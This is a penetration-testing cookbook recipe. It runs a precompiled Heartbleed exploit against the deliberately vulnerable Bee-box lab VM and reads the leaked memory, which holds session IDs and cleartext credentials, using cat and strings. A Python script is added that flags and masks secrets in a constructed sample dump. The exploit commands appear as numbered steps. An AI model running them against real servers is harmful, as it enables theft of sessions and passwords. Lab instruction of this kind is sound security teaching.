In this recipe, we will use our previously compiled Heartbleed exploit to extract information about the vulnerable Bee-box server (https://192.168.56.103:8443/ in this recipe).
The Bee-box virtual machine can be downloaded from https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/ and the installation instructions are there too.
In the previous recipe, we generated an executable from the Heartbleed exploit; we will now use that to exploit the vulnerability on the server.
As Heartbleed is a vulnerability that extracts information from the server's memory, it may be necessary to browse and send requests to the server's HTTPS pages on port 8443 (https://192.168.56.103:8443/) before attempting the exploit, so that there is some information in memory to extract.
1. First, confirm that the target exposes a vulnerable TLS service by scanning it with sslscan:
sslscan 192.168.56.103:8443
2. Change to the directory containing the compiled exploit and display its usage options:
cd heartbleed
./heartbleed --help
3. Run the exploit against the server on port 8443 and write what it retrieves to hb_test.txt:
./heartbleed -s 192.168.56.103 -p 8443 -f hb_test.txt -t 1
4. Display the contents of hb_test.txt:
cat hb_test.txt
Our exploit extracted information from the HTTPS server and, from that, we can see a session ID and even a full login request including a username and password in clear text.
5. Because the dump also contains non-printable bytes, it is easier to read with the strings command:
strings hb_test.txt
As mentioned in Chapter 4, Finding Vulnerabilities, the Heartbleed vulnerability allows an attacker to read information from the OpenSSL server's memory in clear text. This means that we don't need to decrypt or even intercept any communication between the client and the server; we simply ask the server what's in its memory and it responds with the unencrypted information.
In this recipe, we have used a publicly available exploit to perform the attack and obtained at least one valid session ID. It is sometimes possible to find passwords or other sensitive information with Heartbleed dumps.
Finally, the strings command displays only the printable strings in a file, skipping all the special characters and thereby making the dump easier to read.
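As an added example that is not part of the original recipe, the following Python script does what the strings command does over a Heartbleed dump and then flags the kinds of data the recipe found (a session ID, a login request with credentials), masking the secret values so the findings can be reported safely. The dump contents, paths, user name and password below are constructed, not taken from the Bee-box server.

```python
from __future__ import annotations

import re

# Constructed stand-in for hb_test.txt: binary junk interleaved with fragments
# of HTTP requests that were resident in the server's memory (hypothetical values).
SAMPLE_DUMP = (
    b"\x00\x01\x02\xff\xfe"
    b"POST /login.php HTTP/1.1\r\n"
    b"\x13\x03\x00"
    b"Cookie: PHPSESSID=deadbeef0123456789abcdef\r\n"
    b"Authorization: Basic YWxpY2U6czNjcmV0\r\n"
    b"\xaa\xbb\xcc\xdd"
    b"login=alice&password=s3cret&security_level=0&form=submit"
    b"\x00\x00\x00\x00"
)

# Same rule as `strings`: runs of at least 4 printable ASCII bytes.
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")

# Indicators that secrets were sitting in server memory; group 1 is the secret value.
SENSITIVE = {
    "session_cookie": re.compile(r"(?:PHPSESSID|JSESSIONID|ASP\.NET_SessionId)=([A-Za-z0-9]+)"),
    "credential_field": re.compile(r"(?:password|passwd|pwd)=([^&\s]+)", re.IGNORECASE),
    "auth_header": re.compile(r"Authorization:\s*\S+\s+(\S+)"),
}


def extract_strings(dump: bytes, min_len: int = 4) -> list[str]:
    """Return printable runs of at least min_len characters, in file order."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len) if min_len != 4 else PRINTABLE
    return [run.decode("ascii") for run in pattern.findall(dump)]


def mask(line: str, match: re.Match) -> str:
    """Replace the captured secret (group 1) with *** so the line can be shared."""
    start, end = match.span(1)
    return line[:start] + "***" + line[end:]


def triage(dump: bytes) -> dict[str, list[str]]:
    """Classify the extracted strings by the type of secret they expose."""
    findings: dict[str, list[str]] = {name: [] for name in SENSITIVE}
    for line in extract_strings(dump):
        for name, pattern in SENSITIVE.items():
            match = pattern.search(line)
            if match:
                findings[name].append(mask(line, match))
    return findings


if __name__ == "__main__":
    for category, lines in triage(SAMPLE_DUMP).items():
        print(category, lines)
```

On a real dump, replace SAMPLE_DUMP with the bytes read from hb_test.txt; every category that comes back non-empty is data the server would have leaked to anyone on the network.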